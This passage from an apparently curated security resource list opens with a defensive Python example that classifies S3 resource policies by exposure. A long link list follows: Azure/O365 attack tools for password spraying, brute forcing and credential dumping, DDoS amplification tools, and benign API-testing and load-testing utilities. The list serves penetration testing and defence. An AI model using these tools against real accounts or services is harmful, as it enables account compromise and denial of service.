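rpCheckup, Dow Jones Hammer and endgame (listed above) all turn on the same question: who does a resource policy actually let in? The following is an added example, my own code and not part of any of those tools, that classifies an S3-style resource policy into the exposure classes rpCheckup's description uses (public, external account, intra-org, private). It only inspects `Allow` statements, treats `Principal: "*"` as public unless an `aws:PrincipalOrgID` condition scopes it to the organization, and compares account IDs in principal ARNs against a known member set. The account IDs, organization ID and policies are constructed; a real tool would also evaluate `NotPrincipal`, other conditions and the account's block-public-access settings.

```python
# Exposure ranking used to report the widest grant in a policy.
RANK = {"private": 0, "intra-org": 1, "external": 2, "public": 3}


def _principals(stmt: dict) -> list:
    """Normalize the Principal element ("*", {"AWS": [...]}, {"Service": ...}) into strings."""
    p = stmt.get("Principal", {})
    if p == "*":
        return ["*"]
    out = []
    for v in (p.values() if isinstance(p, dict) else [p]):
        out.extend(v if isinstance(v, list) else [v])
    return out


def _account_of(principal: str):
    """12-digit account id from an ARN or a bare account id; None if absent."""
    if principal.isdigit() and len(principal) == 12:
        return principal
    parts = principal.split(":")
    return parts[4] if len(parts) >= 5 and parts[4] else None


def _org_scoped(stmt: dict, org_id: str) -> bool:
    """True if the statement carries an aws:PrincipalOrgID condition naming org_id."""
    cond = stmt.get("Condition", {})
    for op in ("StringEquals", "ForAnyValue:StringEquals"):
        vals = cond.get(op, {}).get("aws:PrincipalOrgID")
        if vals and org_id in (vals if isinstance(vals, list) else [vals]):
            return True
    return False


def classify_policy(policy: dict, own_accounts: set, org_id: str) -> str:
    """Return the widest exposure any Allow statement grants."""
    worst = "private"
    for stmt in policy.get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue                                  # Deny never widens access
        for pr in _principals(stmt):
            if pr == "*":
                level = "intra-org" if _org_scoped(stmt, org_id) else "public"
            elif "arn:" not in pr and "." in pr:
                level = "private"                     # AWS service principal
            else:
                level = "private" if _account_of(pr) in own_accounts else "external"
            if RANK[level] > RANK[worst]:
                worst = level
    return worst


# Constructed test data: two organization member accounts and four policies.
OWN_ACCOUNTS = {"111122223333", "444455556666"}
ORG_ID = "o-exampleorg1"

PUBLIC_READ = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Principal": "*", "Action": "s3:GetObject",
     "Resource": "arn:aws:s3:::demo-bucket/*"}]}

ORG_SCOPED = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Principal": {"AWS": "*"}, "Action": "s3:GetObject",
     "Resource": "arn:aws:s3:::demo-bucket/*",
     "Condition": {"StringEquals": {"aws:PrincipalOrgID": ORG_ID}}}]}

CROSS_ACCOUNT = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Deny", "Principal": "*", "Action": "s3:*",          # ignored: Deny
     "Resource": "arn:aws:s3:::demo-bucket/*",
     "Condition": {"Bool": {"aws:SecureTransport": "false"}}},
    {"Effect": "Allow",
     "Principal": {"AWS": ["arn:aws:iam::111122223333:root", "999988887777"]},
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::demo-bucket/*"}]}

PRIVATE_ROLE = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow",
     "Principal": {"AWS": "arn:aws:iam::444455556666:role/Reader",
                   "Service": "logging.s3.amazonaws.com"},
     "Action": "s3:PutObject", "Resource": "arn:aws:s3:::demo-bucket/*"}]}


def classify_all() -> dict:
    return {name: classify_policy(pol, OWN_ACCOUNTS, ORG_ID)
            for name, pol in [("public_read", PUBLIC_READ), ("org_scoped", ORG_SCOPED),
                              ("cross_account", CROSS_ACCOUNT), ("private_role", PRIVATE_ROLE)]}


if __name__ == "__main__":
    for name, level in classify_all().items():
        print(f"{name:14s} {level}")
```

The `Deny` in the cross-account policy is deliberately ignored: a Deny on insecure transport does not narrow who may read, which is why a checker must not treat the presence of any Deny as evidence that a bucket is locked down.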
- ROADtools - a framework to interact with Azure AD. It currently consists of a library (roadlib) and the ROADrecon Azure AD exploration tool: https://github.com/dirkjanm/ROADtools
- o365recon - script to retrieve information via O365 with a valid cred: https://github.com/nyxgeek/o365recon
- MailSniper - a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used as a non-administrative user to search their own email, or by an Exchange administrator to search the mailboxes of every user in a domain: https://github.com/dafthack/MailSniper
- o365creeper - a simple Python script used to validate email accounts that belong to Office 365 tenants: https://github.com/LMGsec/o365creeper
- Sparrow.ps1 - created by CISA's Cloud Forensics team to help detect possible compromised accounts and applications in the Azure/m365 environment: https://github.com/cisagov/Sparrow
- CrowdStrike Reporting Tool for Azure (CRT): https://github.com/CrowdStrike/CRT
- MSOLSpray - A password spraying tool for Microsoft Online accounts (Azure/O365): https://github.com/dafthack/MSOLSpray
- AADInternals - PowerShell module contains tools for administering and hacking Azure AD and Office 365: https://o365blog.com/aadinternals/ | https://github.com/Gerenios/AADInternals
- Stormspotter - creates an “attack graph” of the resources in an Azure subscription. It enables red teams and pentesters to visualize the attack surface and pivot opportunities within a tenant, and supercharges your defenders to quickly orient and prioritize incident response work: https://github.com/Azure/Stormspotter
- m365_groups_enum - Enumerate Microsoft 365 Groups in a tenant with their metadata: https://github.com/cnotin/m365_groups_enum
- Microsoft Azure & O365 CLI Tool Cheatsheet: https://github.com/dafthack/CloudPentestCheatsheets/blob/master/cheatsheets/Azure.md
- BruteLoops - a dead simple library providing the foundational logic for efficient password brute force attacks against authentication interfaces: https://github.com/arch4ngel/BruteLoops
- MicroBurst - a PowerShell Toolkit for Attacking Azure that includes functions and scripts that support Azure Services discovery, weak configuration auditing, and post exploitation actions such as credential dumping. It is intended to be used during penetration tests where Azure is in use: https://github.com/NetSPI/MicroBurst
- PowerZure - a PowerShell project created to assess and exploit resources within Microsoft’s cloud platform: https://github.com/hausec/PowerZure
- Azure-Red-Team - collection of AAD recon and attack resources: https://github.com/rootsecdev/Azure-Red-Team
- AzureAD_Autologon_Brute - Brute force attack tool for Azure AD Autologon: https://github.com/nyxgeek/AzureAD_Autologon_Brute
- Go365 - a tool designed to perform user enumeration and password guessing attacks on organizations that use Office365 (now/soon Microsoft365). Go365 uses a unique SOAP API endpoint on login.microsoftonline.com that most other tools do not use: https://github.com/optiv/Go365
- BlueHound - a tool that helps blue teams pinpoint the security issues that actually matter. By combining information about user permissions, network access and unpatched vulnerabilities, BlueHound reveals the paths attackers would take if they were inside your network: https://github.com/zeronetworks/BlueHound | https://zeronetworks.com/blog/bluehound-community-driven-resilience/
- GraphSpy - the Swiss army knife for attacking M365 & Entra: https://github.com/RedByte1337/GraphSpy
- Graphpython - a modular Python tool for cross-platform Microsoft Graph API enumeration and exploitation: https://github.com/mlcsec/Graphpython
- Online Packet Analyzer: http://packettotal.com/
- CyberChef: https://gchq.github.io/CyberChef/
- Docker Image Analyzer: https://anchore.io/
- URL Scanner / Sandbox: https://urlscan.io/
- Steve Gibson Shields UP / UPNP Exposure Test: https://www.grc.com/x/ne.dll?rh1dkyd2
- Phish AI: https://app.phish.ai/#/scan_url
- Mozilla Observatory: https://observatory.mozilla.org/
- Qualys SSL Labs Server Test: https://www.ssllabs.com/ssltest/
- Qualys SSL Labs Browser Test: https://www.ssllabs.com/ssltest/viewMyClient.html
- Explain Shell Commands: https://explainshell.com/
- HTML/CSS/JS interactive Cheatsheet: http://htmlcheatsheet.com/
- JSfiddle: https://jsfiddle.net/
- Code validator (YAML, JSON, JS, etc.): https://codebeautify.org/yaml-validator
- social IDE: https://codepen.io/
- json path finder: https://jsonpath.com/
- json query language: https://jmespath.org/
- repl.it - online Python compiler: https://repl.it/
- codepen - a social development environment for front-end designers and developers. Build and deploy a website, show off your work, build test cases to learn and debug, and find inspiration: https://codepen.io/
- render - Build, deploy, and scale your apps with unparalleled ease – from your first user to your billionth: https://render.com/
- dillinger - live markdown editor: https://dillinger.io/
- glitch - the friendly community where everyone codes together: https://glitch.com/
- JS lint: https://jshint.com/
- JSON schema data generator: https://json-schema-faker.js.org/
- Search for open source repositories on GitHub, GitLab, and Bitbucket: https://www.bithublab.org/
- Python Regex tester: https://pythex.org/
- dnstwister - domain name permutation engine: https://dnstwister.report/
- Mozilla SSL Configuration Generator: https://ssl-config.mozilla.org/
- graphql-playground: https://github.com/graphql/graphql-playground
- Postman Cheatsheet: https://postman-quick-reference-guide.readthedocs.io/en/latest/index.html
- explore-with-postman: https://github.com/ambertests/explore-with-postman
- Great collection of examples: https://github.com/DannyDainton
- Test automation university: https://testautomationu.applitools.com/Automation
- Loops with Postman: https://thisendout.com/2017/02/22/loops-dynamic-variables-postman-pt2/
- All CheatSheets: http://overapi.com/
- Hosted REST API: https://reqres.in/
- httpbin - A simple HTTP Request & Response Service: http://httpbin.org/
- Fake REST API with JSON and POSTMAN: https://dev.to/tadea/fake-rest-api-with-json-and-postman-5gi8
- Petstore - a sample Petstore server: https://petstore.swagger.io/
- Parabank REST API: http://parabank.parasoft.com/parabank/api-docs/index.html
- Use curl to interact with an API: https://www.redhat.com/sysadmin/use-curl-api
- Cherrybomb - a CLI tool that helps you avoid undefined user behavior by validating your API specifications: https://www.blstsecurity.com/
- hurl - a command line tool that runs HTTP requests defined in a simple plain text format: https://github.com/Orange-OpenSource/hurl
- hoppscotch - Open Source API Development Ecosystem: https://github.com/hoppscotch/hoppscotch
- httptoolkit - an open-source tool for debugging, testing and building with HTTP(S) on Windows, Linux & Mac: https://github.com/httptoolkit/httptoolkit
- schemathesis - a tool that levels up your API testing by using API specs as blueprints for generating test cases. It focuses on testing general properties, such as ensuring no input leads to server errors and all responses adhere to the API spec, rather than just checking specific input-output combinations: https://schemathesis.readthedocs.io/en/stable/index.html
- https://wiki.skullsecurity.org/index.php?title=Passwords
- Seclists - https://github.com/danielmiessler/SecLists
- https://loader.io/
- https://a.blazemeter.com/app/sign-in
- https://artillery.io/
- NodeJS Test Cafe: https://devexpress.github.io/testcafe/
- Google Puppeteer (headless Chrome): https://github.com/GoogleChrome/puppeteer
- GoldenEye - HTTP DoS Test Tool: https://github.com/jseidl/GoldenEye
- Cisco TRex - open source, low cost, stateful and stateless traffic generator fuelled by DPDK: https://trex-tgn.cisco.com/
- UBoat - Botnet simulator: https://github.com/Souhardya/UBoat
- TestProject - free end-to-end test automation platform for web, mobile, and API testing that’s supported by the #1 test automation community: https://testproject.io/
- Karate - open-source tool to combine API test-automation, mocks, performance-testing and even UI automation into a single, unified framework: https://github.com/intuit/karate/blob/master/README.md
- Saddam - DDoS amplification attack tool: https://github.com/OffensivePython/Saddam
- Tsunami - a more professional and efficient version of the network stress tester / denial of service tools known as LOIC: https://sourceforge.net/projects/tsunami-dos/
- dnsperf - a free tool to gather accurate latency and throughput metrics for Domain Name Service (DNS): https://github.com/DNS-OARC/dnsperf
- rpounder - Apache Bench for DNS resolvers: https://github.com/mowings/rpounder
- dnsstresss - Simple Go program to stress test a DNS server: https://github.com/MickaelBergem/dnsstresss
- dnsprobe - a tool built on top of retryabledns that allows you to perform multiple DNS queries of your choice with a list of user-supplied resolvers: https://github.com/projectdiscovery/dnsprobe
- k6 - a modern load testing tool, building on Load Impact's years of experience in the load and performance testing industry: https://github.com/loadimpact/k6
- 🎭 Playwright - a Node library to automate Chromium, Firefox and WebKit with a single API. Playwright is built to enable cross-browser web automation that is evergreen, capable, reliable and fast: https://github.com/microsoft/playwright
- httpie - a user-friendly command-line HTTP client for the API era: https://httpie.org/
- httptoolkit - gives you instant insight and access into every request & response, with zero hassle. Test clients, debug APIs and catch bugs, all at lightning speed: https://httptoolkit.tech/
- hurl - a command line tool that runs HTTP requests defined in a simple plain text format. It can perform requests, capture values and evaluate queries on headers and body response. Hurl is very versatile: it can be used for both fetching data and testing HTTP sessions: https://hurl.dev/
- PacketSender - utility to allow sending and receiving TCP, UDP, and SSL (encrypted TCP) packets: https://github.com/dannagle/PacketSender
- Ddosify - High-performance load testing tool: https://github.com/ddosify/ddosify
- vegeta - a versatile HTTP load testing tool built out of a need to drill HTTP services with a constant request rate. It can be used both as a command line utility and a library: https://github.com/tsenart/vegeta